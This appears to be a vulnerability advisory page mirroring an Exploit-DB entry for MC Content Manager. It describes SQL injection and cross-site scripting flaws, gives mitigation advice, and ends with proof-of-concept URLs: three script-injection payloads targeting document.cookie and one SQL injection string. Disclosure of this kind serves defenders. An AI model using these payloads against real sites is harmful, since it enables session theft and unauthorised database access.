header-logo
Suggest Exploit
vendor:
MC Content Manager
by:
7.5
CVSS
HIGH
SQL Injection and Cross-Site Scripting
89, 79
CWE
Product Name: MC Content Manager
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

SQL Injection and Cross-Site Scripting Vulnerabilities in MC Content Manager

MC Content Manager is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user-supplied input before using it in SQL queries or outputting it in HTML pages. Additionally, implementing proper input validation and using parameterized queries can help prevent SQL injection attacks. Regular security updates and patches should be applied to MC Content Manager to address any existing vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41949/info

MC Content Manager is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

Cross site scripting:

1) http://www.example.com/article.php?root=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

2) http://www.example.com/static.php?page=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

3) http://www.example.com/cms/%3Cbody%20onload=alert(document.cookie)%3E/

SQL Injection:

1) http://www.example.com/cms/ua%20where%201=1--%20/

Navigation

Suggest Exploit

Services By CQR